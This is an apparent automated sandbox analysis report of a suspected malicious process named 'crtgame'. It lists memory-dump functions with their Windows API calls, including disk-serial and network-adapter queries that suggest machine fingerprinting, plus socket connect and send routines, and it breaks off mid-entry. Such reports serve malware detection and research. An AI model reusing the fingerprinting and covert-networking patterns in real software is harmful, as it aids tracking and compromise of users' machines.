Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID: timer
API String ID: 4293676635-1792073242
Opcode ID: 3de2061dd66025ce601b427270210280e87ff2a4f7dc65b28e843f15f5d2302d
Instruction ID: 30b0fee433f547fa5c16d05462f6db8df9358cbbb10ef187efe27f625aa473b8
Opcode Fuzzy Hash: 3de2061dd66025ce601b427270210280e87ff2a4f7dc65b28e843f15f5d2302d
Instruction Fuzzy Hash: 88319EB1904715AFD711DF25C844B16BBE8FF89724F004A2EF85593680D770D994CF96

Function 02C3F1FA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C3F2AF: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C3F2CE
Part of subcall function 02C3F2AF: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C3F30C
Part of subcall function 02C3F2AF: GetLastError.KERNEL32 ref: 02C3F36D
Part of subcall function 02C3F2AF: CloseHandle.KERNELBASE(?), ref: 02C3F3A4

Part of subcall function 02C3F3B3: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C3F3C9
Part of subcall function 02C3F3B3: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C3F3E2
Part of subcall function 02C3F3B3: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C3F407
Part of subcall function 02C3F3B3: FreeLibrary.KERNEL32(00000000), ref: 02C3F490

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C3F248
CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C3F269
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C3F27D
CloseHandle.KERNEL32(00000000), ref: 02C3F286

Strings

tLVh, xrefs: 02C3F250

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
String ID: tLVh
API String ID: 1378705229-319918027
Opcode ID: 18f5ad7cb43cad435f41af6dbdd6ff0cfdb6e113b1ae36786b2a4f74e1bc9d29
Instruction ID: 30245866ee51d1a7a75faf0c8905c25e9c1bc36f418ad800c3cfd230897576b1
Opcode Fuzzy Hash: 18f5ad7cb43cad435f41af6dbdd6ff0cfdb6e113b1ae36786b2a4f74e1bc9d29
Instruction Fuzzy Hash: FF119375D0032CABCB119BA4DC48FDEBB7EAF45710F000A19E909AB180DB744A89CFD0

Function 02C329EE Relevance: 7.6, APIs: 5, Instructions: 79
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C32A3B
closesocket.WS2_32(?), ref: 02C32A42
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C32A89
WSASetLastError.WS2_32(00000000), ref: 02C32A97
closesocket.WS2_32(?), ref: 02C32A9E

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket$ioctlsocket
String ID:
API String ID: 1561005644-0
Opcode ID: a46b616a99fd7fa6912ce4d9ab1f39d765c9dc71421eeef98723761ee696f846
Instruction ID: 8c49055516b0b89edd9f7a1ee491139d818099567f72ce3d67a7aeee1d3daf90
Opcode Fuzzy Hash: a46b616a99fd7fa6912ce4d9ab1f39d765c9dc71421eeef98723761ee696f846
Instruction Fuzzy Hash: 12212872A40305ABEF25ABB8880476EB7E9DF84315F104E6DE945D3240EB70CE84CB62

Function 02C31BA7 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C31BAC
RtlEnterCriticalSection.NTDLL ref: 02C31BBC
RtlLeaveCriticalSection.NTDLL ref: 02C31BEA
RtlEnterCriticalSection.NTDLL ref: 02C31C13
RtlLeaveCriticalSection.NTDLL ref: 02C31C56

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 9c9086c95f9d8267f2305fb65b9a8a48696ffc26f689d9bc3d58c97435614932
Instruction ID: bfaf9ae3c681c1949397f77fb456cb57d7ea6f51705832cd030522d452a70502
Opcode Fuzzy Hash: 9c9086c95f9d8267f2305fb65b9a8a48696ffc26f689d9bc3d58c97435614932
Instruction Fuzzy Hash: DC21ADB5A00614AFCB16CF68D44479ABBB5FF88314F148949EC09A7301DBB4EA45CBE0

Function 02C32EDD Relevance: 6.0, APIs: 4, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C3358B,?,?,?,?,?,?,?,02C38FBF,?), ref: 02C32EEE
WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C32EFD
WSAGetLastError.WS2_32(?,02C3358B,?,?,?,?,?,?,?,02C38FBF,?,?,?,00000001,00000006,?), ref: 02C32F0C
setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C32F36

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Socketsetsockopt
String ID:
API String ID: 2093263913-0
Opcode ID: 57af07fd7e68b6ed5fdc1fee2590fd7d535863e035561dd114627046cd623781
Instruction ID: 906654b23278c453c915fe089548fc0badec38dbf7ee0d8bd8c683bd85d54d02
Opcode Fuzzy Hash: 57af07fd7e68b6ed5fdc1fee2590fd7d535863e035561dd114627046cd623781
Instruction Fuzzy Hash: 9D018872A40314FBDB205F65DC88B5BBBA9EB89771F008A69FA08DB141D771CD40CBA1

Function 02C32DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C32D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C33390,00000001,?,00000000,?,?,?,?,?), ref: 02C32D47
Part of subcall function 02C32D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C32D5C

WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C32E6D
select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C32E83

Strings

3', xrefs: 02C32E22

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Sendselect
String ID: 3'
API String ID: 2958345159-280543908
Opcode ID: f3a48218e9cc25e730a89017073acdfbb1719a79ee2df7a2ab05f5564cef9f78
Instruction ID: f7e4bb7213f38736530c686dfe865721669e46c641eeb84973f931b5a60ae294
Opcode Fuzzy Hash: f3a48218e9cc25e730a89017073acdfbb1719a79ee2df7a2ab05f5564cef9f78
Instruction Fuzzy Hash: 2431DEB1A102099FDF16DFA0D8157EEBBEAEF44314F00495ADD0493280EBB09981CFA2

Function 02C32AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?), ref: 02C32AEA
connect.WS2_32(00000010,?,?), ref: 02C32AF5

Strings

3', xrefs: 02C32B3B

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastconnect
String ID: 3'
API String ID: 374722065-280543908
Opcode ID: 00a74790040972ac6edd2f8cf55d1a3a6f6401ae9d567fb0b158cf6c072046bd
Instruction ID: afbf6f4986cec09124054b71d65c96c1b717397bf1957d985bce96fa54cf301c
Opcode Fuzzy Hash: 00a74790040972ac6edd2f8cf55d1a3a6f6401ae9d567fb0b158cf6c072046bd
Instruction Fuzzy Hash: 1721A471E10208ABCF15AFB4D4146EEBBBAEF84324F10499DDD1993280EB749A059FA1

Function 02C3353E Relevance: 4.6, APIs: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C33543

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b57e1f1c7bc1fb041c1842906e06188018af354c54356fadbd523bbb0ccf1788
Instruction ID: 754502369d0ae6867658e43dc53e6fdc24ee493a5c9001e75d5e5b0628ebb42a
Opcode Fuzzy Hash: b57e1f1c7bc1fb041c1842906e06188018af354c54356fadbd523bbb0ccf1788
Instruction Fuzzy Hash: C6514EB190425ADFCB0ADF68D4406AABBF1FF48320F14855EE8699B380D774DA51CF91

Function 02C3369A Relevance: 4.6, APIs: 3, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedIncrement.KERNEL32(?), ref: 02C336A7

Part of subcall function 02C32420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C32432
Part of subcall function 02C32420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C32445
Part of subcall function 02C32420: RtlEnterCriticalSection.NTDLL(?), ref: 02C32454
Part of subcall function 02C32420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C32469
Part of subcall function 02C32420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C32470

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
String ID:
API String ID: 1601054111-0
Opcode ID: 6fd1740b8821ace625a2df481742295676e65f5fc4925c20a6bfe4820b953c60
Instruction ID: 28af0c85f25fc117a1115c4f32f23cc0474901943264eaa58d0c11d47e6107d2
Opcode Fuzzy Hash: 6fd1740b8821ace625a2df481742295676e65f5fc4925c20a6bfe4820b953c60
Instruction Fuzzy Hash: 7311C1B5100248ABDF229E14CC85FAA3BA9FF81360F104956FD56DB290CB34D9A0CBD4

Function 02C41B10 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON

Download Yara Rule

APIs

__beginthreadex.LIBCMT ref: 02C41B26
CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C3A5F0,00000000), ref: 02C41B57
ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C3A5F0,00000000), ref: 02C41B65

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandleResumeThread__beginthreadex
String ID:
API String ID: 1685284544-0
Opcode ID: 92e3b65fded1d967668082ad634bb5807e78b7169147ad919641cce317678936
Instruction ID: e08fe3430411a9fedcebfe12b0e28be8e04d0aa75d89bb449e0852530319f3e9
Opcode Fuzzy Hash: 92e3b65fded1d967668082ad634bb5807e78b7169147ad919641cce317678936
Instruction Fuzzy Hash: 63F09C712402145BD7209F5CDC84F9273D8EF89735F18066AF598D7280D7B1E8D6DB90

Function 02C31AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(02C674A0), ref: 02C31ABA
WSAStartup.WS2_32(00000002,00000000), ref: 02C31ACB
InterlockedExchange.KERNEL32(02C674A4,00000000), ref: 02C31AD7

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$ExchangeIncrementStartup
String ID:
API String ID: 1856147945-0
Opcode ID: c8f6cadafeea7c1af78c24943cce15dfada0f421a7b3497108c4cb495d9e92c8
Instruction ID: 79b9e1f9450c08deb87cc0495a6998e04472623852e5e3b9ac76a1df199783aa
Opcode Fuzzy Hash: c8f6cadafeea7c1af78c24943cce15dfada0f421a7b3497108c4cb495d9e92c8
Instruction Fuzzy Hash: 15D02B30C903145FF61066A49C4EB39F75CDB00629F000B50FC29D04C0EA5095E885E3

Function 02C34B18 Relevance: 3.1, APIs: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C34B1D

Part of subcall function 02C31BA7: __EH_prolog.LIBCMT ref: 02C31BAC
Part of subcall function 02C31BA7: RtlEnterCriticalSection.NTDLL ref: 02C31BBC
Part of subcall function 02C31BA7: RtlLeaveCriticalSection.NTDLL ref: 02C31BEA
Part of subcall function 02C31BA7: RtlEnterCriticalSection.NTDLL ref: 02C31C13
Part of subcall function 02C31BA7: RtlLeaveCriticalSection.NTDLL ref: 02C31C56

Part of subcall function 02C3DA97: __EH_prolog.LIBCMT ref: 02C3DA9C
Part of subcall function 02C3DA97: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C3DB1B

InterlockedExchange.KERNEL32(?,00000000), ref: 02C34C1D

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
String ID:
API String ID: 1927618982-0
Opcode ID: c61fa7cd2ad1c9748ff06ffa7fd0ab92c9830092058c2501f0be50bd4e52eab6
Instruction ID: 758651b2d3ac952ab2d2ba1d6cb8dc9c4e19abee7d149815709c32d1fe0b5fa7
Opcode Fuzzy Hash: c61fa7cd2ad1c9748ff06ffa7fd0ab92c9830092058c2501f0be50bd4e52eab6
Instruction Fuzzy Hash: B55139B1D04248DFDB16DFA8D484AEEFFB5AF48314F14859AE906AB351DB309A44CF60

Function 02C32D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C33390,00000001,?,00000000,?,?,?,?,?), ref: 02C32D47
WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C32D5C

Part of subcall function 02C39EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C33114), ref: 02C39EB6

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Send
String ID:
API String ID: 1282938840-0
Opcode ID: e607648a88dde7998823a13ef214522cca72a971e3b92d10be897004d3e87c3e
Instruction ID: 7f23ba2acae272d00a0bad814cd53ce762384d23b7736ae6e4f98d0f26cb738e
Opcode Fuzzy Hash: e607648a88dde7998823a13ef214522cca72a971e3b92d10be897004d3e87c3e
Instruction Fuzzy Hash: 0C0184B6500309EFDB215F95D84496BBBEDFF85760B20096EF95993200EB709D40DBA2

Function 02C37D89 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,00000000,?,02C37545,?,02C67454,02C67454,?,?,02C67454,00000000,000007E7), ref: 02C37DA6
shutdown.WS2_32(00000000,00000002), ref: 02C37DAF

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastshutdown
String ID:
API String ID: 1920494066-0
Opcode ID: ad68ff7622e96da4dbd827c65f16f1974b9ed50cca6d4a3cad8e130bb0244ced
Instruction ID: 74a5be52bc44fdc1455a95058354662093f24207be0e9b0ad2a8fe12e9aa60f9
Opcode Fuzzy Hash: ad68ff7622e96da4dbd827c65f16f1974b9ed50cca6d4a3cad8e130bb0244ced
Instruction Fuzzy Hash: 72F0BEB2A40315CFC714AF28E914B6AB7E5EF48320F00495CE995A73C0EB30AC50CBA1

Function 02C35D72 Relevance: 3.0, APIs: 2, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C35D0D
CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C35D14

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseFileHandleWrite
String ID:
API String ID: 1769507746-0
Opcode ID: a1051fb34b607a81cbfef2bdd597d60d4b5acba65eee58b779652e4b115f77dc
Instruction ID: c34e343801b4f6117dcb26b15ba4b32c4460b83c802d7c23e2dfb1160f68ec54
Opcode Fuzzy Hash: a1051fb34b607a81cbfef2bdd597d60d4b5acba65eee58b779652e4b115f77dc
Instruction Fuzzy Hash: 42E02035A405249B8B16DF65F1880DDFB71FFCA3317C805CAD50957204C73555E9C785

Function 02C35044 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C35049

Part of subcall function 02C33D7E: htons.WS2_32(?), ref: 02C33DA2
Part of subcall function 02C33D7E: htonl.WS2_32(00000000), ref: 02C33DB9
Part of subcall function 02C33D7E: htonl.WS2_32(00000000), ref: 02C33DC0

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: htonl$H_prologhtons
String ID:
API String ID: 4039807196-0
Opcode ID: 5c11cee574768e8aac36b972e14791487192fa08c58bb5f8a573a344ddfddf23
Instruction ID: 9e6c02d0296d6a50ec468dc0817b90d8d9472cfafcd2b1dd44d684dceaf5ce9a
Opcode Fuzzy Hash: 5c11cee574768e8aac36b972e14791487192fa08c58bb5f8a573a344ddfddf23
Instruction Fuzzy Hash: 398158B1D0024E9ECF06DFA8D480AEEFBB5EF48314F14855AD851B7280E7365A45CFA4

Function 02C3E360 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3E365

Part of subcall function 02C31A01: TlsGetValue.KERNEL32 ref: 02C31A0A

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: c2204a0dc1ff913ee0195d309a0febd424e24a03358e3a7ac9f2441ff223072f
Instruction ID: a7fac726f4b9e171d6d07247e3f07f77bf09bac8caf9ad20dc794356c32adcc6
Opcode Fuzzy Hash: c2204a0dc1ff913ee0195d309a0febd424e24a03358e3a7ac9f2441ff223072f
Instruction Fuzzy Hash: AE2151B2904209AFDB05DFA4D840AEFBBF9FF48310F14441EE908A3240D771AA00DBA1

Function 02C333B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C333CC

Part of subcall function 02C332AB: __EH_prolog.LIBCMT ref: 02C332B0
Part of subcall function 02C332AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C332C3
Part of subcall function 02C332AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C332EF

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
String ID:
API String ID: 1518410164-0
Opcode ID: a965cb257af821d995ea97d75fd09abed1d7d99b9f36c9507991bebbaec17cb6
Instruction ID: 98a41d7db47e706b3dea040ed9731c052bd7ccda860fc481337b5995c99aa67a
Opcode Fuzzy Hash: a965cb257af821d995ea97d75fd09abed1d7d99b9f36c9507991bebbaec17cb6
Instruction Fuzzy Hash: EC019271214606AFDB05CF59D885F55FBA9FF84330B10875AE928872C0EB70E921CBE0

Function 02C79978 Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 02C8775A

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c6a000_crtgame.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 49c51a860b3d36d624cb910781a0a1864bef1551e5415ba1d6f044677e1ab231
Instruction ID: edc749243359fc631ebf918b2943030f680c37a12f65ffd669d343191a13dbe9
Opcode Fuzzy Hash: 49c51a860b3d36d624cb910781a0a1864bef1551e5415ba1d6f044677e1ab231
Instruction Fuzzy Hash: 68F014B140C7089BD3127F0AD88537ABBE4AF44601F41482CD6C203601FA31A844CA9B

Function 02C3DEF0 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3DEF5

Part of subcall function 02C326DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C32706
Part of subcall function 02C326DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C3272B
Part of subcall function 02C326DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C55583), ref: 02C32738
Part of subcall function 02C326DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C32778
Part of subcall function 02C326DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C327D9

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID:
API String ID: 4293676635-0
Opcode ID: ea6efbe9ef0ca64a998d18c589c969161974600a6b74a86c514e87d0f75220a6
Instruction ID: 73afbf2800de7bdfe3cdfbdf40d861aa1518e8b32a1f625123e07cd4208045bc
Opcode Fuzzy Hash: ea6efbe9ef0ca64a998d18c589c969161974600a6b74a86c514e87d0f75220a6
Instruction Fuzzy Hash: 2E0190B1900B149FC328CF5AD640946FBF5EF88710B15C5AED84A8B721E775DA80CF98

Function 02C8DFD8 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 02C8E012

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c6a000_crtgame.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
Instruction ID: b40fb7770db007e8293da851e82045faf20e78b8bfc2845415703bd813ceb50d
Opcode Fuzzy Hash: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
Instruction Fuzzy Hash: D8E04FF290C6149FE7557A589C417ADB7D4DF04220F06453DD7C883640E536540086CB

Function 02C74F43 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32 ref: 02C8B90E

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c6a000_crtgame.jbxd

Similarity

API ID: FolderPathSpecial
String ID:
API String ID: 994120019-0
Opcode ID: ff03a919f29713a23cdb21b5f2393f2c5619326714cd4e682bb34091d861f6b8
Instruction ID: 777a660263c4e088087785ceb7c1b455d9245b28c3864009df868a32831ea8b9
Opcode Fuzzy Hash: ff03a919f29713a23cdb21b5f2393f2c5619326714cd4e682bb34091d861f6b8
Instruction Fuzzy Hash: AEE01AB044C70CCBE314BEA9DC8A32AB7A4AB14701F05081DC7E203241FA316A94DB9B

Function 02C3DCCF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3DCD4

Part of subcall function 02C4356D: _malloc.LIBCMT ref: 02C43585

Part of subcall function 02C3DEF0: __EH_prolog.LIBCMT ref: 02C3DEF5

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_malloc
String ID:
API String ID: 4254904621-0
Opcode ID: 3b13b6fa81e443880f9fc8cb43d0074238a75e0ea500e4eef42a47b2d86a8d65
Instruction ID: 2f9a5bc957023653e1a5270422874948874d9165da344e2f6211b0a1b098f581
Opcode Fuzzy Hash: 3b13b6fa81e443880f9fc8cb43d0074238a75e0ea500e4eef42a47b2d86a8d65
Instruction Fuzzy Hash: 13E0CD70A041459BCF0DDF98D80076FB7A6DB44300F0045AD7C0AD7640DF718A405A45

Function 02C42E72 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C4567A: __getptd_noexit.LIBCMT ref: 02C4567B
Part of subcall function 02C4567A: __amsg_exit.LIBCMT ref: 02C45688

Part of subcall function 02C42EB3: __getptd_noexit.LIBCMT ref: 02C42EB7
Part of subcall function 02C42EB3: __freeptd.LIBCMT ref: 02C42ED1
Part of subcall function 02C42EB3: RtlExitUserThread.NTDLL(?,00000000,?,02C42E93,00000000), ref: 02C42EDA

__XcptFilter.LIBCMT ref: 02C42E9F

Part of subcall function 02C487B4: __getptd_noexit.LIBCMT ref: 02C487B8

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
String ID:
API String ID: 1405322794-0
Opcode ID: f3c4c21c7829f6f2bfa7d3f5ffc79c8a51382a07e7accb0a5433eef540278a1d
Instruction ID: 99e14ecacce933fec62ed41e8bf96f3544e373919ecff679cf7d9873110208fe
Opcode Fuzzy Hash: f3c4c21c7829f6f2bfa7d3f5ffc79c8a51382a07e7accb0a5433eef540278a1d
Instruction Fuzzy Hash: 5DE0ECB5940600AFEB08FBA0D949F6E7BA6AF04701F200149F5019B3A0DEB4A940AE21

Function 02C41B80 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 02C41030: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C410D0
Part of subcall function 02C41030: CloseHandle.KERNEL32(00000000), ref: 02C410E5
Part of subcall function 02C41030: ResetEvent.KERNEL32(00000000), ref: 02C410EF
Part of subcall function 02C41030: CloseHandle.KERNEL32(00000000,6BE866C2), ref: 02C41124

TlsSetValue.KERNEL32(00000025,?), ref: 02C41BCA

Memory Dump Source

